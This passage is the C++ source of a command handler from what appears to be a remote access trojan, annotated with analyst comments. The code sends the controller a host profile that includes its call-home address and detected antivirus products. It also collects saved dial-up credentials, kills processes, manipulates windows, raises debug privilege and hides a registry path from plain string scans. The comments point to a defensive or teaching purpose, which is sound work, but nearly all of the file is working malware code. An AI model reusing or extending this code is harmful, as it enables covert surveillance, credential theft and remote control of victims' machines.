
// SystemManager.cpp: implementation of the CSystemManager class.
//
//////////////////////////////////////////////////////////////////////
#include "StdAfx.h"
#include "SystemManager.h"
#include "Dialupass.h"
#include <tlhelp32.h>
#include <psapi.h>
#include <iphlpapi.h>
#pragma comment(lib,"Iphlpapi.lib")
#pragma comment(lib,"Psapi.lib")
#include "../until.h"
// Host-profile record that CSystemManager::GetSystemInfo() fills in and hands
// to Send() as one block of sizeof(MESSAGEInfo) bytes.
// Analyst note: every field is a fixed-size buffer, so the record always has
// the same length; fields the sender does not write keep whatever the stack held.
typedef struct
{
BYTE bToken; // = 1
CHAR szCpuSpeend[32]; // CPU speed
CHAR szCpuInfo[128]; // CPU description
CHAR szPcName[50]; // computer name
CHAR szUserName[32]; // user name
CHAR szScrSize[32]; // screen resolution
CHAR LineName[100]; // call-home host name / address
CHAR LinePort[32]; // call-home port
CHAR Program[256]; // path of the running program
CHAR InstallOpen[100]; // how the program was started (run mode)
CHAR szUserVirus[256]; // antivirus products detected on the host
DWORD Memory; // memory size
}MESSAGEInfo;
//////////////////////////////////////////////////////////////////////
// Message identifiers defined locally in this file; numbering starts at 100.
// The other COMMAND_* / TOKEN_* values used below are declared elsewhere.
enum
{
COMMAND_MEMOEY=100, // command: start reporting CPU / memory usage
COMMAND_STOPED, // command: stop the reporting loop
TOKEN_MEMORY // tag byte of the memory-usage message sent by this side
};
// Information-class numbers passed to NtQuerySystemInformation in
// SendCPUAndMemoryThread().
#define SystemBasicInformation 0
#define SystemPerformanceInformation 2
#define SystemTimeInformation 3
// Converts a LARGE_INTEGER to double: HighPart * 2^32 + LowPart.
#define Li2Double(x) ((double)((x).HighPart) * 4.294967296E9 + (double)((x).LowPart))
// Locally declared result layouts for the three information classes above.
// NOTE(review): these are hand-written here rather than taken from a header;
// presumably they match the running OS - confirm before relying on any field.
typedef struct{
DWORD dwUnknown1;
ULONG uKeMaximumIncrement;
ULONG uPageSize;
ULONG uMmNumberOfPhysicalPages;
ULONG uMmLowestPhysicalPage;
ULONG uMmHighestPhysicalPage;
ULONG uAllocationGranularity;
PVOID pLowestUserAddress;
PVOID pMmHighestUserAddress;
ULONG uKeActiveProcessors;
BYTE bKeNumberProcessors;
BYTE bUnknown2;
WORD wUnknown3;
}SYSTEM_BASIC_INFORMATION;
typedef struct
{
LARGE_INTEGER liIdleTime;
DWORD dwSpare[76];
} SYSTEM_PERFORMANCE_INFORMATION;
typedef struct
{
LARGE_INTEGER liKeBootTime;
LARGE_INTEGER liKeSystemTime;
LARGE_INTEGER liEXPTimeZoneBias;
ULONG uCurrentTimeZoneId;
DWORD dwReserved;
} SYSTEM_TIME_INFORMATION;
// Function-pointer type and file-level pointer for NtQuerySystemInformation;
// the pointer is resolved at run time with GetProcAddress, not linked statically.
typedef LONG (WINAPI *PROCNTQSI)(UINT,PVOID,ULONG,PULONG);
PROCNTQSI NtQuerySystemInformation;
////////////////////////////////////////////////////////////////////////////////////////////
// Forward declaration of the free-function privilege helper defined below.
BOOL DebugPrivilege(const char *PName,BOOL bEnable);
// Stores the connection parameters given by the caller, creates the event
// that stops the CPU/memory reporting thread, and immediately sends a
// process list.
// Analyst note: constructing the object is enough to trigger process
// enumeration; no command has to be received first.
CSystemManager::CSystemManager(CClientSocket *pClient,UINT Ports,UCHAR Linetypes,UCHAR Opertypes,CHAR *Addressl) : CManager(pClient)
{
NetPort = Ports; // connection port
NetLine = Linetypes; // connection type
NetOpert = Opertypes; // run mode
Linkaddress = Addressl; // connection address
// Unnamed event, auto-reset, initially non-signalled.
StopEvent=CreateEvent(NULL,false,false,NULL);
SendProcessList();
}
// Destructor. The thread teardown is commented out, so this function releases
// nothing: neither StopEvent nor hSendMemoryThread is closed here.
CSystemManager::~CSystemManager()
{
// TerminateThread( hSendMemoryThread, 0);
// CloseHandle(hSendMemoryThread);
}
// Command dispatcher: the first byte of the received buffer selects the
// handler; the remaining bytes (if any) are the handler's arguments.
// Analyst notes:
//  - nSize is not checked before lpBuffer[0] is read, and only KillProcess is
//    given a length; the window handlers read fixed-size fields from lpBuffer+1.
//  - The set of cases below is the capability list of this module: host
//    profile, process / window / TCP / installed-software listings, dial-up
//    credential listing, process termination, window manipulation, and a
//    periodic CPU/memory report.
void CSystemManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
{
// Defined elsewhere; called before every command is handled.
SwitchInputDesktop();
switch (lpBuffer[0])
{
case COMMAND_SYSTEMINFO:
GetSystemInfo();
break;
case COMMAND_PSLIST:
SendProcessList();
break;
case COMMAND_WSLIST:
SendWindowsList();
break;
case COMMAND_DIALUPASS: // dial-up passwords
SendDialupassList();
break;
case COMMAND_TSLIST:
SendTcpList();
break;
case COMMAND_KILLPROCESS: // terminate processes
KillProcess((LPBYTE)lpBuffer + 1, nSize - 1);
break;
case COMMAND_WINDOW_CLOSE: // post a close message to a window
CloseWindow(lpBuffer+1);
break;
case COMMAND_WINDOW_TEST: // maximise / minimise / hide a window
TestWindow(lpBuffer+1);
break;
case COMMAND_MEMOEY: // start reporting CPU / memory usage
// A new thread is started on every such command; the previous handle value
// in hSendMemoryThread is overwritten without being closed.
hSendMemoryThread= MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)SendCPUAndMemoryThread, (LPVOID)this, 0, NULL);
break;
case COMMAND_STOPED:
// Signals the reporting thread to leave its loop.
SetEvent(StopEvent);
break;
case COMMAND_rjLIST:
SendSoftList();
break;
default:
break;
}
}
// Builds the process list with getProcessList(), passes the whole LocalAlloc
// block to Send(), then frees it. Does nothing if no buffer was produced.
void CSystemManager::SendProcessList()
{
UINT nRet = -1; // unused
LPBYTE lpBuffer = getProcessList();
if (lpBuffer == NULL)
return;
// The length sent is the allocation size reported by LocalSize().
Send((LPBYTE)lpBuffer, LocalSize(lpBuffer));
LocalFree(lpBuffer);
}
// Builds the visible-window list with getWindowsList(), passes the whole
// LocalAlloc block to Send(), then frees it.
void CSystemManager::SendWindowsList()
{
UINT nRet = -1; // unused
LPBYTE lpBuffer = getWindowsList();
if (lpBuffer == NULL)
return;
// The length sent is the allocation size reported by LocalSize().
Send((LPBYTE)lpBuffer, LocalSize(lpBuffer));
LocalFree(lpBuffer);
}
// Serialises every entry exposed by a CDialupass object and hands the result
// to Send(). Layout: one TOKEN_DIALUPASS byte, then for each entry STR_MAX
// NUL-terminated strings back to back.
// Analyst note: CDialupass comes from Dialupass.h (not shown); from the name
// and the dispatcher comment it presumably collects saved dial-up account
// credentials - treat this message as credential exfiltration when triaging.
void CSystemManager::SendDialupassList()
{
CDialupass pass;
int nPacketLen = 0;
int i;
// Pass 1: total size of all strings including their terminators.
for (i = 0; i < pass.GetMax(); i++)
{
COneInfo *pOneInfo = pass.GetOneInfo(i);
for (int j = 0; j < STR_MAX; j++)
nPacketLen += lstrlen(pOneInfo->Get(j)) + 1;
}
nPacketLen += 1; // room for the leading token byte
// LPTR zero-initialises the block; the result is not checked for NULL.
LPBYTE lpBuffer = (LPBYTE)LocalAlloc(LPTR, nPacketLen);
DWORD dwOffset = 1; // byte 0 is reserved for the token
// Pass 2: copy each string, terminator included.
for (i = 0; i < pass.GetMax(); i++)
{
COneInfo *pOneInfo = pass.GetOneInfo(i);
for (int j = 0; j < STR_MAX; j++)
{
int nFieldLength = lstrlen(pOneInfo->Get(j)) + 1;
memcpy(lpBuffer + dwOffset, pOneInfo->Get(j), nFieldLength);
dwOffset += nFieldLength;
}
}
lpBuffer[0] = TOKEN_DIALUPASS;
Send((LPBYTE)lpBuffer, LocalSize(lpBuffer));
LocalFree(lpBuffer);
}
// Terminates every process whose ID appears in the buffer, then sends a
// fresh process list. The buffer is read as consecutive 4-byte process IDs.
// Analyst notes:
//  - The IDs come straight from the received command; nSize is not required
//    to be a multiple of 4, so the last read can run past the data.
//  - The OpenProcess result is used without a NULL check.
//  - A full-access OpenProcess followed by TerminateProcess against another
//    process is the observable behaviour of this command.
void CSystemManager::KillProcess(LPBYTE lpBuffer, UINT nSize) // terminate processes
{
HANDLE hProcess = NULL;
for (unsigned int i = 0; i < nSize; i += 4)
{
DWORD Ipsid = *(LPDWORD)(lpBuffer + i);
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_ALL_ACCESS,FALSE,Ipsid);
TerminateProcess(hProcess, 0);
CloseHandle(hProcess);
}
// Brief sleep to avoid errors
Sleep(200);
// Refresh the process list
SendProcessList();
// Refresh the window list
// SendWindowsList();
}
// Enumerates running processes from a Toolhelp snapshot and returns a
// LocalAlloc buffer: TOKEN_PSLIST, then per process
//   PID (DWORD) + exe name + NUL + full image path + NUL.
// Returns NULL only when the snapshot cannot be created; the caller frees
// the buffer with LocalFree.
// Analyst notes:
//  - SeDebugPrivilege is enabled for the duration of the walk and disabled
//    again afterwards; on the early NULL return it stays enabled.
//  - strProcessName is never cleared between iterations, so when the module
//    query fails for a process the path of the previous process is reported.
//  - Processes with ID 0, 4 and 8 are left out of the list.
//  - Sequence to look for in telemetry: privilege adjustment, process
//    snapshot, then OpenProcess with QUERY_INFORMATION|VM_READ on every PID.
LPBYTE CSystemManager::getProcessList()
{
HANDLE hSnapshot = NULL;
HANDLE hProcess = NULL;
HMODULE hModules = NULL;
PROCESSENTRY32 pe32 = {0};
DWORD cbNeeded;
char strProcessName[MAX_PATH] = {0};
LPBYTE lpBuffer = NULL;
DWORD dwOffset = 0;
DWORD dwLength = 0;
DebugPrivilege(SE_DEBUG_NAME, TRUE); // raise privilege
// Take a snapshot of the running processes
hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if(hSnapshot == INVALID_HANDLE_VALUE)
return NULL;
pe32.dwSize = sizeof(PROCESSENTRY32);
lpBuffer = (LPBYTE)LocalAlloc(LPTR, 1024); // provisional buffer, grown below as needed
lpBuffer[0] = TOKEN_PSLIST;
dwOffset = 1;
if(Process32First(hSnapshot, &pe32)) // first process; also shows whether the snapshot is usable
{
do
{
// Open the process and obtain a handle (done before the PID filter below)
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pe32.th32ProcessID);
if ((pe32.th32ProcessID !=0 ) && (pe32.th32ProcessID != 4) && (pe32.th32ProcessID != 8))
{
// First module handle, i.e. the executable itself
EnumProcessModules(hProcess, &hModules, sizeof(hModules), &cbNeeded);
// Full path of the executable
GetModuleFileNameEx(hProcess, hModules, strProcessName, sizeof(strProcessName));
// Work out how much buffer this entry needs; the layout matters to the receiver
// Bytes needed for this process
dwLength = sizeof(DWORD) + lstrlen(pe32.szExeFile) + lstrlen(strProcessName) + 2;
// Buffer too small: reallocate
if (LocalSize(lpBuffer) < (dwOffset + dwLength))
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, (dwOffset + dwLength), LMEM_ZEROINIT|LMEM_MOVEABLE);
// Record layout: PID + exe name + NUL + full path + NUL
memcpy(lpBuffer + dwOffset, &(pe32.th32ProcessID), sizeof(DWORD));
dwOffset += sizeof(DWORD);
memcpy(lpBuffer + dwOffset, pe32.szExeFile, lstrlen(pe32.szExeFile) + 1);
dwOffset += lstrlen(pe32.szExeFile) + 1;
memcpy(lpBuffer + dwOffset, strProcessName, lstrlen(strProcessName) + 1);
dwOffset += lstrlen(strProcessName) + 1;
}
CloseHandle(hProcess);// marked "newly modified" by the author
}
while(Process32Next(hSnapshot, &pe32)); // advance to the next process
}
// Trim the buffer to the bytes actually used
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset, LMEM_ZEROINIT|LMEM_MOVEABLE);
DebugPrivilege(SE_DEBUG_NAME, FALSE); // drop the privilege again
CloseHandle(hSnapshot); // release the snapshot handle
return lpBuffer; // return the data
}
// Enables (bEnable != 0) or disables the privilege named PName on the
// current process token. Returns FALSE when the token cannot be opened or
// when GetLastError() is not ERROR_SUCCESS after the adjustment.
// Analyst note: token privilege changes are auditable on Windows (for
// example event 4703 when the corresponding audit policy is enabled).
BOOL DebugPrivilege(const char *PName,BOOL bEnable)
{
BOOL bResult = TRUE;
HANDLE hToken;
TOKEN_PRIVILEGES TokenPrivileges;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken))
{
bResult = FALSE;
return bResult;
}
TokenPrivileges.PrivilegeCount = 1;
TokenPrivileges.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;
// The lookup result is not checked; on failure Luid is left as it was.
LookupPrivilegeValue(NULL, PName, &TokenPrivileges.Privileges[0].Luid);
AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
// The last-error value is tested rather than the call's return value.
if (GetLastError() != ERROR_SUCCESS)
{
bResult = FALSE;
}
CloseHandle(hToken);
return bResult;
}
// EnumWindows callback. lParam points at the caller's LPBYTE; each visible
// window with a non-empty title appends one record to that buffer:
//   owning process ID (DWORD) + window title + NUL.
// Always returns true so enumeration continues.
// Analyst notes:
//  - The DWORD written is the process ID from GetWindowThreadProcessId, not
//    the window handle (the commented-out older version below wrote hwnd).
//  - The append position is found by walking back over trailing zero bytes
//    of the existing allocation, so it depends on the previous record's content.
//  - The LocalReAlloc result is used without a NULL check.
bool CALLBACK CSystemManager::EnumWindowsProc(HWND hwnd, LPARAM lParam)
{
DWORD dwLength = 0;
DWORD dwOffset = 0;
DWORD dwProcessID = 0; // unused
LPBYTE lpBuffer = *(LPBYTE *)lParam;
char strTitle[1024];
try
{
GetWindowText(hwnd, strTitle, sizeof(strTitle)-1);
strTitle[sizeof(strTitle)-1]=0;
// Skip windows that are hidden or have no title.
if (!IsWindowVisible(hwnd) || lstrlen(strTitle) == 0)
return true;
if (lpBuffer == NULL)
{
// First record: one byte for the token, data starts at offset 1.
lpBuffer = (LPBYTE)LocalAlloc(LPTR, 1);
dwOffset=1;
}else
{
// Later records: start from the allocation size and back up over
// trailing zero bytes.
dwOffset = LocalSize(lpBuffer);
while(*(lpBuffer + dwOffset - 2)==0) dwOffset--;
}
dwLength = sizeof(DWORD) + lstrlen(strTitle) + 1;
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset + dwLength, LMEM_ZEROINIT|LMEM_MOVEABLE);
}catch (...)
{
return true;
}
// Write the owning process ID directly into the record.
GetWindowThreadProcessId(hwnd, (LPDWORD)(lpBuffer + dwOffset));
memcpy(lpBuffer + dwOffset + sizeof(DWORD), strTitle, lstrlen(strTitle) + 1);
// Publish the (possibly moved) buffer back to the caller.
*(LPBYTE *)lParam = lpBuffer;
return true;
}
/*
memset(strTitle, 0, sizeof(strTitle));
//得到系统传递进来的窗口句柄的窗口标题
GetWindowText(hwnd, strTitle, sizeof(strTitle));
//这里判断 窗口是否可见 或标题为空
if (!IsWindowVisible(hwnd) || lstrlen(strTitle) == 0)
return true;
//同进程管理一样我们注意他的发送到主控端的数据结构
if (lpBuffer == NULL)
lpBuffer = (LPBYTE)LocalAlloc(LPTR, 1); //暂时分配缓冲区
dwLength = sizeof(DWORD) + lstrlen(strTitle) + 1;
dwOffset = LocalSize(lpBuffer);
//重新计算缓冲区大小
lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset + dwLength, LMEM_ZEROINIT|LMEM_MOVEABLE);
//下面两个memcpy就能看到数据结构为 hwnd+窗口标题+0
memcpy((lpBuffer+dwOffset),&hwnd,sizeof(DWORD));
memcpy(lpBuffer + dwOffset + sizeof(DWORD), strTitle, lstrlen(strTitle) + 1);
*(LPBYTE *)lParam = lpBuffer;
return true;
}
*/
// Runs EnumWindows with EnumWindowsProc as the collector and stamps the
// resulting buffer with TOKEN_WSLIST in byte 0. The caller frees the buffer
// with LocalFree.
// NOTE(review): lpBuffer is still NULL if the callback never appended a
// record, and byte 0 is written without checking for that.
LPBYTE CSystemManager::getWindowsList()
{
LPBYTE lpBuffer = NULL;
EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)&lpBuffer);
lpBuffer[0] = TOKEN_WSLIST;
return lpBuffer;
}
//获取内存使用情况
// Sends one 12-byte usage sample through the CSystemManager passed in lparam.
// Layout: TOKEN_MEMORY (1 byte), available physical memory (DWORD), the
// caller-supplied value d (DWORD; the CPU usage figure when called from
// SendCPUAndMemoryThread), then 3 zero bytes of padding.
void SendCPUAndMemoryInfo(DWORD d,LPVOID lparam)
{
CSystemManager *pThis = (CSystemManager *)lparam;
char buf[12];
ZeroMemory(buf,12);
buf[0]=TOKEN_MEMORY;
MEMORYSTATUS mem;
::GlobalMemoryStatus(&mem);
memcpy(buf+1,(void*)&mem.dwAvailPhys,sizeof(DWORD)); // available physical memory
memcpy(buf+1+sizeof(DWORD),(void*)&d,sizeof(DWORD));
pThis->Send((unsigned char *)buf,12);
}
// Thread body started by the COMMAND_MEMOEY handler; lparam is the owning
// CSystemManager. Samples system and idle time through
// NtQuerySystemInformation, derives a CPU-usage percentage from the deltas
// and sends it together with the free-memory figure. The loop repeats after
// a wait of up to 3000 ms on StopEvent and ends when that event is signalled,
// after which the client connection is disconnected.
// Returns 0 on any query failure, otherwise 1 (true).
// Analyst note: NtQuerySystemInformation is resolved by name from ntdll at
// run time, so it does not appear in the import table.
DWORD WINAPI CSystemManager::SendCPUAndMemoryThread(LPVOID lparam)
{
CSystemManager *pThis = (CSystemManager *)lparam;
// Sleep(3000);
SYSTEM_PERFORMANCE_INFORMATION SysPerfInfo;
SYSTEM_TIME_INFORMATION SysTimeInfo;
SYSTEM_BASIC_INFORMATION SysBaseInfo;
double dbIdleTime;
double dbSystemTime;
LONG status;
LARGE_INTEGER liOldIdleTime = {0,0};
LARGE_INTEGER liOldSystemTime = {0,0};
// Writes the file-level function pointer; shared by every thread that runs this.
NtQuerySystemInformation = (PROCNTQSI)GetProcAddress(GetModuleHandle("ntdll"),"NtQuerySystemInformation");
if (!NtQuerySystemInformation)
return 0;
// get number of processors in the system
status = NtQuerySystemInformation(SystemBasicInformation,&SysBaseInfo,sizeof(SysBaseInfo),NULL);
if (status != NO_ERROR)
return 0;
//printf(" CPU Usage (press any key to exit): ");
BYTE count=0; // unused
while(1)
{
// get new system time
status = NtQuerySystemInformation(SystemTimeInformation,&SysTimeInfo,sizeof(SysTimeInfo),0);
if (status!=NO_ERROR)
return 0;
// get new CPU's idle time
status = NtQuerySystemInformation(SystemPerformanceInformation,&SysPerfInfo,sizeof(SysPerfInfo),NULL);
if (status != NO_ERROR)
return 0;
// if it's a first call - skip it
if (liOldIdleTime.QuadPart != 0)
{
// CurrentValue = NewValue - OldValue
dbIdleTime = Li2Double(SysPerfInfo.liIdleTime) - Li2Double(liOldIdleTime);
dbSystemTime = Li2Double(SysTimeInfo.liKeSystemTime) -Li2Double(liOldSystemTime);
// CurrentCpuIdle = IdleTime / SystemTime
dbIdleTime = dbIdleTime / dbSystemTime;
// CurrentCpuUsage% = 100 - (CurrentCpuIdle * 100) / NumberOfProcessors
// (+0.5 rounds to nearest when the value is truncated below)
dbIdleTime = 100.0 - dbIdleTime * 100.0 /(double)SysBaseInfo.bKeNumberProcessors + 0.5;
SendCPUAndMemoryInfo((unsigned long)dbIdleTime,lparam);
}
// store new CPU's idle and system time
liOldIdleTime = SysPerfInfo.liIdleTime;
liOldSystemTime = SysTimeInfo.liKeSystemTime;
// Sampling interval: wait up to 3 s, leave the loop as soon as the stop event fires.
if (WaitForSingleObject(pThis->StopEvent,3000)==WAIT_OBJECT_0)
{
break;
}
}
// Stopping the reporter also drops the client connection.
pThis->m_pClient->Disconnect();
return true;
}
///////////////////////////////////////////杀毒显示////////////////////////////////////
// Lookup table used by GetViru(): process image name -> display label.
// Analyst note: these image names are what the code probes for on the host;
// a process walk that matches against this set indicates security-product
// discovery.
typedef struct
{
char *Course; // process image name to look for
char *Name; // label reported when that process is running
}ANTIVIRUS;
// 20 slots are declared, 16 are initialised; the entry whose fields are a
// single space is the end-of-table sentinel that GetViru() stops on.
ANTIVIRUS g_AntiVirus_Data[20] =
{
{"360tray.exe", "360安全卫士"},
{"360sd.exe", "360杀毒"},
{"avp.exe", "卡巴斯基"},
{"KvMonXP.exe", "江民杀毒"},
{"RavMonD.exe", "瑞星杀毒"},
{"Mcshield.exe", "麦咖啡"},
{"egui.exe", "NOD32"},
{"kxetray.exe", "金山毒霸"},
{"knsdtray.exe", "可牛杀毒"},
{"TMBMSRV.exe", "趋势杀毒"},
{"avcenter.exe", "Avira(小红伞)"},
{"ashDisp.exe", "Avast网络安全"},
{"rtvscan.exe", "诺顿杀毒"},
{"ksafe.exe", "金山卫士"},
{"QQPCRTP.exe", "QQ电脑管家"},
{" ", " "}
};
// Returns a space-separated list of the labels from g_AntiVirus_Data whose
// process is currently running, as decided by GetProcessID() (defined
// elsewhere). When nothing matched, the buffer holds the literal "not found"
// string appended below.
// The result lives in a function-static 1024-byte buffer that is cleared and
// rewritten on every call, so callers must copy it before the next call.
char* GetViru()
{
static char AllName[1024];
int t=0;
memset(AllName, 0, sizeof(AllName));
while(1)
{
// An entry containing a space is the sentinel that ends the table.
if (strstr(g_AntiVirus_Data[t].Course, " " ) == 0 )
{
if (GetProcessID(g_AntiVirus_Data[t].Course))
{
lstrcat( AllName, g_AntiVirus_Data[t].Name);
lstrcat( AllName, " " );
}
}
else
break;
t++;
}
// No space in the buffer means no label was appended above.
if (strstr(AllName, " " ) == 0 )
{
lstrcat(AllName , "未发现 ");
}
return AllName;
}
//=========================================================
// Finds the first process whose image name equals lpName and opens that
// process's access token into hToken (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY).
// Image names are upper-cased before the exact, case-sensitive comparison, so
// lpName has to be given in upper case.
// Returns the OpenProcessToken result when a match is found.
// NOTE(review): also returns TRUE when the walk finishes without any match,
// leaving hToken untouched; and the process handle opened for the match is
// never closed in this function.
// Analyst note: opening another process's token is the observable step here.
BOOL GetTokenByName(HANDLE &hToken,LPSTR lpName)
{
if(!lpName)
{
return FALSE;
}
HANDLE hProcessSnap = NULL;
BOOL bRet = FALSE;
PROCESSENTRY32 pe32 = {0};
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == INVALID_HANDLE_VALUE)
return (FALSE);
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hProcessSnap, &pe32))
{
do
{
// Upper-case in place so the comparison below ignores the on-disk casing.
_strupr(pe32.szExeFile);
if(!strcmp(pe32.szExeFile,lpName))
{
HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION,FALSE,pe32.th32ProcessID);
bRet = OpenProcessToken(hProcess,TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&hToken);
CloseHandle (hProcessSnap);
return (bRet);
}
}
while (Process32Next(hProcessSnap, &pe32));
bRet = TRUE;
}
else
bRet = FALSE;
CloseHandle (hProcessSnap);
return (bRet);
}
//=================获得当前登陆用户名及计算机名称====================
// Resolves the account and domain name of the user that owns EXPLORER.EXE,
// i.e. the interactively logged-on user rather than the account this code
// runs under. Both output buffers are treated as 50 characters long.
// Returns TRUE on success, FALSE if any step fails.
// NOTE(review): hToken has no initial value here; whether it is valid depends
// entirely on what GetTokenByName did.
BOOL GetCurrentUserName(char szUser[],char szDomain[])
{
HANDLE hToken;
// Get the token of the shell process
if(!GetTokenByName(hToken,"EXPLORER.EXE"))
{
return FALSE;
}
DWORD cbti = 0;
PTOKEN_USER ptiUser = NULL;
SID_NAME_USE snu;
// Ask for the required size; this call is expected to fail with a zero-length
// buffer, so success is treated as an error.
if (GetTokenInformation(hToken, TokenUser, NULL, 0, &cbti))
{
CloseHandle(hToken);
return FALSE;
}
// Allocate the buffer
ptiUser = (PTOKEN_USER) HeapAlloc(GetProcessHeap(), 0, cbti);
if(!ptiUser)
{
CloseHandle(hToken);
return FALSE;
}
// Fetch the token's user information
if (!GetTokenInformation(hToken, TokenUser, ptiUser, cbti, &cbti))
{
CloseHandle(hToken);
HeapFree(GetProcessHeap(), 0, ptiUser);
return FALSE;
}
DWORD nUser = 50;
DWORD nDomain = 50;
// Resolve the user's SID to an account name and domain
if (!LookupAccountSid(NULL, ptiUser->User.Sid, szUser, &nUser, szDomain, &nDomain, &snu))
{
CloseHandle(hToken);
HeapFree(GetProcessHeap(), 0, ptiUser);
return FALSE;
}
CloseHandle(hToken);
HeapFree(GetProcessHeap(), 0, ptiUser);
return TRUE;
}
// Writes the logged-on user's name into szUser, or a fixed "no user logged
// on" message when the lookup fails. The domain name is fetched but discarded.
// NOTE(review): the name is staged in a 50-byte buffer and copied without a
// length limit; the one caller in this file passes a 32-byte field.
void GetCurrentUserNamet(char szUser[])
{
char TszUser[50]={0};
char TszDomain[50]={0};
if(GetCurrentUserName(TszUser,TszDomain))
{
wsprintf(szUser,"%s",TszUser);
}
else
{
wsprintf(szUser,"%s","无用户登陆状态!");
}
}
// Replaces the stored connection port; the value is later reported by
// GetSystemInfo().
void CSystemManager::NetSystem(UINT Port)
{
NetPort = Port; // connection port
}
extern char* MyDecode(char *str);
// Collects a host profile into a MESSAGEInfo record and hands the whole
// record to Send(): CPU speed and name (registry), computer name, logged-on
// user, screen size, configured call-home host and port, own image path, run
// mode, detected antivirus products and total physical memory in MiB.
// Analyst notes:
//  - Infomsg is not zero-initialised, so bytes after each string terminator
//    (and szCpuInfo entirely, if its registry read fails) are whatever the
//    stack held; those bytes are sent as part of the record.
//  - The registry path is built from individual characters instead of a
//    string literal, presumably so that it does not appear as one contiguous
//    string in the binary.
//  - The CPU-name key is opened with KEY_ALL_ACCESS although it is only read.
//  - The message reports the implant's own path, run mode and C2 endpoint,
//    which makes it useful for scoping when it is recovered from traffic.
void CSystemManager::GetSystemInfo()
{
MESSAGEInfo Infomsg;
// Operating-system related information
Infomsg.bToken = TOKEN_SYSTEMINFO;
//////////////CPU Speed/////////////////
DWORD dwCpu, dwBufLen;
HKEY hKey;
char JYvni02[] = {'H','A','R','D','W','A','R','E','\\','D','E','S','C','R','I','P','T','I','O','N','\\','S','y','s','t','e','m','\\','C','e','n','t','r','a','l','P','r','o','c','e','s','s','o','r','\\','0','\0'};
// Neither the open nor the query result is checked; dwCpu is uninitialised
// if either fails.
RegOpenKeyEx( HKEY_LOCAL_MACHINE,
JYvni02,
0, KEY_QUERY_VALUE, &hKey );
dwBufLen = sizeof(DWORD);
RegQueryValueEx( hKey, ("~MHz"), NULL, NULL,(LPBYTE)&dwCpu, &dwBufLen);
RegCloseKey(hKey);
wsprintf(Infomsg.szCpuSpeend,("~%u MHz"), dwCpu);
//Get CPU Info===============================
CHAR SubKey[] = {'H','A','R','D','W','A','R','E','\\','D','E','S','C','R','I','P','T','I','O','N','\\','S','y','s','t','e','m','\\','C','e','n','t','r','a','l','P','r','o','c','e','s','s','o','r','\\','0','\0','\0'};
hKey = NULL;
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,SubKey,0L,KEY_ALL_ACCESS,&hKey) == ERROR_SUCCESS)
{
DWORD dwType;
DWORD dwSize = 128 * sizeof(TCHAR);
char ValueSz[MAX_PATH]={0};
// DelSpace is defined elsewhere; its result is copied without a length limit
// into the 128-byte szCpuInfo field.
if(RegQueryValueEx(hKey,("ProcessorNameString"),NULL,&dwType,(BYTE *)ValueSz,&dwSize) == ERROR_SUCCESS)
strcpy(Infomsg.szCpuInfo,DelSpace(ValueSz));
RegCloseKey(hKey);
}
//Get Computer & User Name========================
DWORD dwLen = sizeof(Infomsg.szPcName);
GetComputerNameA(Infomsg.szPcName, &dwLen);
// Current (interactive) user name
GetCurrentUserNamet(Infomsg.szUserName);
//Get Screen Size=================================
//////////////////////////////////////////////////
wsprintf(Infomsg.szScrSize, ("%d * %d"), GetSystemMetrics(SM_CXSCREEN),GetSystemMetrics(SM_CYSCREEN));
// if(NetLine==0)
// wsprintf(Infomsg.LineName,"域名IP上线%s",Linkaddress); //域名上线写入
// if(NetLine==1)
// wsprintf(Infomsg.LineName,"QQ空间上线%s",Linkaddress); //QQ上线写入
// if(NetLine==2)
// wsprintf(Infomsg.LineName,"网盘上线:%s",Linkaddress); //网盘上线写入
char *lpszHost = NULL;
DWORD dwPort = 80;
// These two reads use the class members; the local array declared just below
// shadows Linkaddress from that point on.
lpszHost = Linkaddress;
dwPort = NetPort;
char Linkaddress[MAX_PATH]={0}; // unused local
char strTMPTime[MAX_PATH]={0}; // unused local
char strTMPHostB[MAX_PATH]={0}; // unused local
// wsprintf(strTMPHostA, "%s","域名上线");
// Call-home address, prefixed with a fixed label; LineName is 100 bytes and
// the host string is not length-limited.
wsprintf(Infomsg.LineName,"域名IP上线%s",lpszHost); // call-home host
wsprintf(Infomsg.LinePort,"%d",NetPort); // call-home port
char szbuf[256];
// NOTE(review): the buffer is 256 bytes but the size passed is MAX_PATH.
GetModuleFileName(NULL,szbuf,MAX_PATH); // path of this program's own image
wsprintf(Infomsg.Program,"%s",szbuf );
if(NetOpert==0) // portable, run once (no persistence)
{
wsprintf(Infomsg.InstallOpen,"%s","(绿色运行模式)--重启不上线!"); // run-mode label
}
else if(NetOpert==1) // started as a service
{
wsprintf(Infomsg.InstallOpen,"%s","(服务启动模式)--SYSTEM用户运行!"); // run-mode label
}
else if(NetOpert==2) // started directly (Run-key style start, per the label)
{
wsprintf(Infomsg.InstallOpen,"%s","(Run启动模式)--当前用户运行!"); // run-mode label
}
wsprintf(Infomsg.szUserVirus,"%s",GetViru()); // detected antivirus products
// Memory size
MEMORYSTATUSEX MemInfo; // GlobalMemoryStatusEx can report more than 2 GB
MemInfo.dwLength=sizeof(MemInfo);
GlobalMemoryStatusEx(&MemInfo);
// The cast binds before the divisions, so the byte count is narrowed to
// unsigned long first and only then scaled to MiB.
Infomsg.Memory = (unsigned long)MemInfo.ullTotalPhys/1024/1024;
